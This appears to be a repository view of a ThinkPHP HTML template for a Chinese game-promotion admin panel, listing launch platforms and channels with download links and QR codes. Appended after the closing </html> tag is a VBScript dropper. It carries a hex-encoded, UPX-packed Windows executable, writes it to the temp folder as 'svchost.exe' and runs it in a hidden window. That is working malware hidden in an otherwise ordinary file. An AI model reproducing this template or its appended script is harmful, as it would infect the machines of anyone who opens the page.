You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

508 lines
128 KiB
HTML

5 years ago
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<title><eq name="is_launch" value="1">投放平台列表<else />渠道信息</eq>|----软件管理平台</title>
<link href="http://admin.vlcms.com/Public/icon.ico" type="image/x-icon" rel="shortcut icon">
<link href="__CSS__/20180207/common.css" rel="stylesheet" type="text/css">
<link href="__CSS__/20180207/game.css" rel="stylesheet" type="text/css">
<style>
.data_list table {
border: solid 1px #cbcbcb;
width: 100%;
clear: both;
border-collapse: collapse;
font-size: 13px;
border-spacing: 0;
}
tr{margin:0;padding:0;}
.data_list table th {
background-color: #F0F5F7;
box-shadow: 0px -3px 0px 0px #EDEDED inset;
height: 37px;
line-height: 37px;
border-bottom: solid 1px #b6cad2;
text-indent: 11px;
text-align: center;
height: 50px;
line-height: 50px;
}
.data_list table td {
line-height: 38px; text-align: center; position: relative;
border-right: dotted 1px #c7c7c7;
}
.zwm_tab tbody tr {height:44px;}
.zclip embed {margin-top:-27px;}
</style>
<script type="text/javascript" src="__STATIC__/jquery-2.0.3.min.js"></script>
<script type="text/javascript" src="__JS__/20170831/common.js"></script>
</head>
<style>
html{width:100%;min-width: auto;}
body {
padding: 0px;
}
.main {padding:0 20px 20px;}
.zwm_tab tbody tr~tr{border-top:dotted 1px #c7c7c7;}
</style>
<body>
<div id="main" class="main" style="min-height: 342px;">
<div class="cf" style="padding-top:20px;">
</div>
<eq name="is_launch" value="1">
<!--投放-->
<!-- 数据列表 -->
<div class="data_list box_mt">
<div class="">
<table class="zwm_tab">
<!-- 表头 -->
<thead>
<tr>
<th>投放平台</th>
<th>创建时间</th>
<eq name="notchild" value="1">
<th>游戏包</th>
<th>下载链接</th>
<th>二维码</th>
<th>推广注册</th>
</eq>
<th>备注</th>
</tr>
</thead>
<!-- 列表 -->
<tbody>
<empty name="list_data">
<tr>
<td colspan="7" style="text-align: center;height: 45vh;">
<img src="__IMG__/20180207/icon_wushujv2.png"/>
<p style="line-height: 40px;color: #A5A5A5;">暂无数据</p>
</td>
</tr>
<else />
<volist name="list_data" id="data">
<tr><?php $platform_name = get_launch_platform_name($data['platform_id'],'--');?>
<td>{$platform_name}</td>
<td>{$data.launch_time|date='Y-m-d H:i:s',###}</td>
<eq name="notchild" value="1">
<eq name="Think.get.sdk_version" value="1">
<td>
<p class="p_icon">
<notempty name="data.launch_down_url">
<a class="js_xzb" target="_blank" href="{$data.launch_down_url}">
<img src="__IMG__/20180207/icon_download.png" width="20" height="20" alt="">
</a>
<else />
<a class="" href="javascript:;">
<img src="__IMG__/20180207/icon_download2.png" width="20" height="20" alt="">
</a>
</notempty>
</p>
</td>
<td>
<p class="p_android p_icon">
<notempty name="data.launch_down_url">
<a class="js_androidcopy copy" href="javascript:;" version="1" data-platform="{$platform_name}" data-url="http://{$_SERVER['HTTP_HOST']}{:U('Down/launch_down_file',array('platform_id'=>$data['platform_id'],'position'=>$data['position'],'game_id'=>$data['game_id'],'promote_id'=>$data['promote_id']))}">
<img src="__IMG__/20180207/icon_copy.png" width="16" height="16" alt="">
</a>
<else/>
<a class="" href="javascript:;" version="1" data-url="" >
<img src="__IMG__/20180207/icon_copy2.png" width="16" height="16" alt="">
</a>
</notempty>
</p>
</td>
<td>
<p class="erwei_p p_icon">
<span class="erwei_span">
<notempty name="data.launch_down_url">
<a class="zwm_aerwei js_erwei" href="javascript:;" enable_status="{$data.enable_status}">
<img src="__IMG__/20180207/icon_samllerwei.png" width="" height="" alt="二维码">
</a>
<else/>
<a class="" href="javascript:;">
<img src="__IMG__/20180207/icon_samllerwei2.png" width="" height="" alt="二维码">
</a>
</notempty>
<span class="imgbig_erwei" >
<img class="" src="{:U('Apply/qrcode',['url'=>base64_encode(base64_encode('http://'.$_SERVER['HTTP_HOST'].U('Home/promotionofregistration',['pid'=>$data['promote_id'],'gid'=>$relation_game_id,'lid'=>$data['platform_id'],'p'=>$data['position']])))])}" width="" height="" alt="二维码">
<a class="btn_erwei">下载二维码图片</a>
</span>
</span>
</p>
</td>
<td>
<a href="{:U('Home/promotionofregistration',['pid'=>$data['promote_id'],'gid'=>$relation_game_id,'lid'=>$data['platform_id'],'p'=>$data['position']])}" class="a_promition" target="view_window">推广注册</a>
</td>
<else />
<td>
<p class="p_icon">
<notempty name="data.launch_down_url">
<a class="js_xzb" target="_blank" href="{$data.launch_down_url}">
<img src="__IMG__/20180207/icon_download.png" width="20" height="20" alt="">
</a>
<else />
<a class="" href="javascript:;">
<img src="__IMG__/20180207/icon_download2.png" width="20" height="20" alt="">
</a>
</notempty>
</p>
</td>
<td>
<p class="p_ios p_icon">
<notempty name="data.launch_plist_url">
<a class="js_ioscopy copy" href="javascript:;" version="2" data-platform="{$platform_name}" data-url="http://{$_SERVER['HTTP_HOST']}{:U('Down/launch_down_file',array('platform_id'=>$data['platform_id'],'position'=>$data['position'],'game_id'=>$data['game_id'],'promote_id'=>$data['promote_id']))}">
<img src="__IMG__/20180207/icon_copy.png" width="16" height="16" alt="">
</a>
<else/>
<a class="" href="javascript:;" version="2" data-url="" >
<img src="__IMG__/20180207/icon_copy2.png" width="16" height="16" alt="">
</a>
</notempty>
</p>
</td>
<td>
<p class="erwei_p p_icon">
<span class="erwei_span">
<notempty name="data.launch_plist_url">
<a class="zwm_aerwei js_erwei" href="javascript:;" enable_status="{$data.enable_status}">
<img src="__IMG__/20180207/icon_samllerwei.png" width="" height="" alt="二维码" >
</a>
<else/>
<a class="" href="javascript:;">
<img src="__IMG__/20180207/icon_samllerwei2.png" width="" height="" alt="二维码">
</a>
</notempty>
<span class="imgbig_erwei" >
<img class="" src="{:U('Apply/qrcode',['url'=>base64_encode(base64_encode('http://'.$_SERVER['HTTP_HOST'].U('Home/promotionofregistration',['pid'=>$data['promote_id'],'gid'=>$relation_game_id,'lid'=>$data['platform_id'],'p'=>$data['position']])))])}" width="" height="" alt="二维码">
<a class="btn_erwei">下载二维码图片</a>
</span>
</span>
</p>
</td>
<td>
<a href="{:U('Home/promotionofregistration',['pid'=>$data['promote_id'],'gid'=>$relation_game_id,'lid'=>$data['platform_id'],'p'=>$data['position']])}" class="a_promition" target="view_window">推广注册</a>
</td>
</eq>
</eq>
<td style="width:210px;"><p title="{$data.remark}" style="width:200px;text-overflow:ellipsis;overflow:hidden;white-space:nowrap;display:block;margin:0 auto;">{$data.remark}</p></td>
</tr>
</volist>
</empty>
</tbody>
</table>
</div>
</div>
<div class="pagenation clearfix">
<a class="sch-btn" id="export_data" href="{:U('Export/game_apply_launch',array(
'applyid'=>I('applyid'),
'sdk_version'=>I('sdk_version'),
'rgid'=>I('rgid'),'notchild'=>$notchild,
'xlsname'=>'游戏管理_游戏列表_'.($notchild==1?'我的游戏':'子渠道游戏').'_投放平台列表'
))}" >导出</a>
{$_page}
</div>
<else />
<!--渠道-->
<div class="data_list box_mt">
<div class="">
<table class="zwm_tab">
<!-- 表头 -->
<thead>
<tr>
<th>创建时间</th>
<eq name="notchild" value="1">
<th>游戏包</th>
<th>下载链接</th>
<th>二维码</th>
<th>推广注册</th>
</eq>
</tr>
</thead>
<tbody>
<empty name="list_data">
<tr>
<td colspan="5" style="text-align: center;height: 45vh;">
<img src="__IMG__/20180207/icon_wushujv2.png"/>
<p style="line-height: 40px;color: #A5A5A5;">暂无数据</p>
</td>
</tr>
<else />
<volist name="list_data" id="data">
<tr>
<td>{$data.apply_time|date='Y-m-d H:i:s',###}</td>
<eq name="notchild" value="1">
<eq name="Think.get.sdk_version" value="1">
<td>
<p class="p_icon">
<notempty name="data.pack_url">
<a class="js_xzb" target="_blank" href="{$data.pack_url}">
<img src="__IMG__/20180207/icon_download.png" width="20" height="20" alt="">
</a>
<else />
<a class="" href="javascript:;">
<img src="__IMG__/20180207/icon_download2.png" width="20" height="20" alt="">
</a>
</notempty>
</p>
</td>
<td>
<p class="p_android p_icon">
<notempty name="data.pack_url">
<a class="js_androidcopy copy" href="javascript:;" version="1" data-platform="{$platform_name}" data-url="http://{$_SERVER['HTTP_HOST']}{:U('Down/down_file',array('game_id'=>$data['game_id'],'promote_id'=>$data['promote_id']))}">
<img src="__IMG__/20180207/icon_copy.png" width="16" height="16" alt="">
</a>
<else/>
<a class="" href="javascript:;" version="1" data-url="" >
<img src="__IMG__/20180207/icon_copy2.png" width="16" height="16" alt="">
</a>
</notempty>
</p>
</td>
<td>
<p class="erwei_p p_icon">
<span class="erwei_span">
<notempty name="data.pack_url">
<a class="zwm_aerwei js_erwei" href="javascript:;" enable_status="{$data.enable_status}">
<img src="__IMG__/20180207/icon_samllerwei.png" width="" height="" alt="二维码">
</a>
<else/>
<a class="" href="javascript:;">
<img src="__IMG__/20180207/icon_samllerwei2.png" width="" height="" alt="二维码">
</a>
</notempty>
<span class="imgbig_erwei" >
<img class="" src="{:U('Apply/qrcode',['url'=>base64_encode(base64_encode('http://'.$_SERVER['HTTP_HOST'].U('Home/promotionofregistration',['pid'=>$data['promote_id'],'gid'=>$relation_game_id])))])}" width="" height="" alt="二维码">
<a class="btn_erwei">下载二维码图片</a>
</span>
</span>
</p>
</td>
<td>
<a href="{:U('Home/promotionofregistration',['pid'=>$data['promote_id'],'gid'=>$relation_game_id])}" class="a_promition" target="view_window">推广注册</a>
</td>
<else />
<td>
<p class="p_icon">
<notempty name="data.pack_url">
<a class="js_xzb" target="_blank" href="{$data.pack_url}">
<img src="__IMG__/20180207/icon_download.png" width="20" height="20" alt="">
</a>
<else />
<a class="" href="javascript:;">
<img src="__IMG__/20180207/icon_download2.png" width="20" height="20" alt="">
</a>
</notempty>
</p>
</td>
<td>
<p class="p_ios p_icon">
<notempty name="data.plist_url">
<a class="js_ioscopy copy" href="javascript:;" version="2" data-platform="{$platform_name}" data-url="http://{$_SERVER['HTTP_HOST']}{:U('Down/down_file',array('game_id'=>$data['game_id'],'promote_id'=>$data['promote_id']))}">
<img src="__IMG__/20180207/icon_copy.png" width="16" height="16" alt="">
</a>
<else/>
<a class="" href="javascript:;" version="2" data-url="" >
<img src="__IMG__/20180207/icon_copy2.png" width="16" height="16" alt="">
</a>
</notempty>
</p>
</td>
<td>
<p class="erwei_p p_icon">
<span class="erwei_span">
<notempty name="data.plist_url">
<a class="zwm_aerwei js_erwei" href="javascript:;" enable_status="{$data.enable_status}">
<img src="__IMG__/20180207/icon_samllerwei.png" width="" height="" alt="二维码" >
</a>
<else/>
<a class="" href="javascript:;">
<img src="__IMG__/20180207/icon_samllerwei2.png" width="" height="" alt="二维码">
</a>
</notempty>
<span class="imgbig_erwei" >
<img class="" src="{:U('Apply/qrcode',['url'=>base64_encode(base64_encode('http://'.$_SERVER['HTTP_HOST'].U('Home/promotionofregistration',['pid'=>$data['promote_id'],'gid'=>$relation_game_id])))])}" width="" height="" alt="二维码">
<a class="btn_erwei">下载二维码图片</a>
</span>
</span>
</p>
</td>
<td>
<a href="{:U('Home/promotionofregistration',['pid'=>$data['promote_id'],'gid'=>$relation_game_id])}" class="a_promition" target="view_window">推广注册</a>
</td>
</eq>
</eq>
</tr>
</volist>
</empty>
</tbody>
</table>
</div>
</div>
</eq>
</div>
<script src="__STATIC__/zeroclipboard/jquery.zclip.min.js"></script>
<script src="__STATIC__/layer/layer.js"></script>
<script>
setValue('row','{:I("get.row",10)}');
$(function() {
if (navigator.userAgent.indexOf('Firefox') >= 0) {
$(".btn_erwei").text("右击保存图片");
}
var row = '{:I("get.row",10)}';
//下载二维码
$(".btn_erwei").click(function(){
var img_url= "http://{$_SERVER['HTTP_HOST']}"+ $(this).siblings("img").attr("src");
var $a = $("<a></a>").attr("href", img_url).attr("download", "img.png");
$a[0].click();
});
$("#search").click(function () {
var url = $(this).attr('url');
var query = $('.jssearch').find('input').serialize();
query += "&" + $('.jssearch').find('select').serialize();
query = query.replace(/(&|^)(\w*?\d*?\-*?_*?)*?=?((?=&)|(?=$))/g, '');
query = query.replace(/^&/g, '');
if (url.indexOf('?') > 0) {
url += '&' + query;
} else {
url += '?' + query;
}
window.location.href = url;
});
$('input[name="small"]').keyup(function(event) {
var e = event || window.event;
if(e.keyCode == 13) {
$('#search').click();
}
return false;
});
$(".js_erwei").click(function(){
var en=$(this).attr('enable_status');
if(en !='1'){
layer.msg('暂无下载', {
icon: 7,
time: 2000 //2秒关闭如果不配置默认是3秒
});
return;
}
var that=$(this);
that.closest('table').find('.js_erwei').removeClass('active');
that.closest('table').find('.imgbig_erwei').hide();
var imgb = that.siblings('.imgbig_erwei');
if (that.hasClass('active')) {
that.removeClass('active');
imgb.hide();
} else {
that.addClass('active');
imgb.show();
}
//判断但是最后两条信息时,点击小的二维码,大的二维码在上面显示
var index = that.closest('tr').index();
if (parseInt(row) - parseInt(index + 1) < 2){
that.next().css({
top:'auto',
bottom: '22px'
});
}
$(document).on('click',function(event) {
var event = event || window.event;
var target = $(event.target);
if (target.hasClass('erwei_span') || target.closest('.erwei_span').length>0) {
} else {
imgb.hide();
}
});
});
$('a.copy').zclip({
path: '__STATIC__/zeroclipboard/ZeroClipboard.swf',
copy: function(){
var url=$(this).attr('data-url');
var host='http://'+'{:$_SERVER['HTTP_HOST']}';
if(url==host){
return '';
}else{
return $(this).attr('data-url');
}
},
beforeCopy:function(){
$(this).addClass("proc");
},
afterCopy:function(){
$(this).removeClass("copy");
if( $(this).attr('data-url')=="" || $(this).attr('data-url')== null|| $(this).attr('data-url')== 'http://'+'{:$_SERVER['HTTP_HOST']}' ){
layer.msg("暂无下载内容",{icon:2});
}else{
if( $(this).attr('version')==1){
layer.msg($(this).attr('data-platform')+"下载复制成功",{icon:1,time:1000});
}else{
layer.msg($(this).attr('data-platform')+"下载复制成功",{icon:1,time:1000});
}
}
}
});
});
</script>
</body>
</html>
5 years ago
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010000D2000000040000000000000000000000000000400000E02E727372630000000010000000D002000006000000D60000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303300555058210D09020838ADBE177792F93FD0A0020023D000000048010026000012B29FA89200FF25304041CD6EE59202E4420564401919197970005C8C01191919C8EC94BF1D90B14435F4244105558BEC81C49AED60FE3CFFFFFFC7855C2B094C37B3FFE6EF0A195DD08175A035FF4DAC1155A0C9C204306E7FBF9F6845E0322D45A4346A35E804021C331F39D921085C803534311A8C8CBDFBBC815D0639C4C9C372143069B6DFDE3437353322F038383237833838BB9BBF1B700936333631FF8D4429B52C05017D7CB2F7EFE8F7950E836DCC00488AF0343532BEEFF6DDFC343491D0B23231748F046F791E39D9B60C18D83436CC3FB37BECFFF50185585DFF4D76198D3FF66FBF246365EC1E4588214DB4019D735DB40011951C61B2BB7809317DF8E77409DC00CD5D1E8EE03834459D7C16D6AEFBF60F37A88D9558FE0C528D8D7C065190388C4CC203044738A46B66BB05597F74DCF8350D509163939933694CBCCC386C84C9BAF40500D7044C0831D8D7CE16698406AB5171D8B2F7F7C1899D4F015588337AF7BBC2B3BDB4519CFF663A68312CDCBE8536475237DC8BBC332360369BCCDC219D488D14B9F73BBF8773D058009B9031E22FBFBD0BB85D2FEC35323835843631DF0EFF3CC8897DE081A52E723737814DDDB60DC394330C74F48235069564F6FE0AEE9E5C7721F7559C56BE67BECF4282D83134BE48B8E6B7EF7104786809094FC2F03321BD3C9193ADF1115DF8312999107C7736608DB077AD10133474096E123AA600973624E69B8423BB6408FF05124C3C8D7DCE261960B406FC094DDCC681D0B5080C94AC34579BD928FCDC3131B17440BB041BDF5930B44C5D5D80C0A41FFB1D0BD800297DC0312C217DFC83AD170B59E34681A01197B5AEDF6FBF16204C35290D197D80F79DBBF77684D2B75D366DE43368671105858E0C188F4C1C9C38376670127E3C23AFCC5703061430A5D35F6C54E505363834F89F91BEBDD93536C77AA7B021B5604819990CF3D0218578A0447448DF370F85E45052FF75A46043C9ACF4B3F483C48009C4314D8C771936D9DB6D7D07F08902295DF0496C9E846FB037884650378AD470D85A83EB9C05338403353636B637DE45DC3338682145E49088FA805BDB71DB13AC5B55A84583552F06D0ABF5C864547CB4373382A5AC05476BF874817B324A2F6C5B6FCC9177B8DCF471F0834DA54B8DEDA031210381CF863137D919DFD99E9C510718B1C7123C4F3232407C9C33349449EFF16653C6B1FADB37C9AD3DBC3135CCDC8C32320A9330093B560770EA3083353BE7E8BE354FE8323169B3F8F40064066B64D39831D2B76DAE124E0436315053C7CB1A7F9D4C6833AF75D468EBD6C2F7D72120F06A31069D84F8FB671D58C69C21899F342E722C0874E0F43732B93732D908A62B043CED82CFC9C8643D10B88481F0C0E1D36DC4E881AD0AA0211E5D69A1BDC0902913A5
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>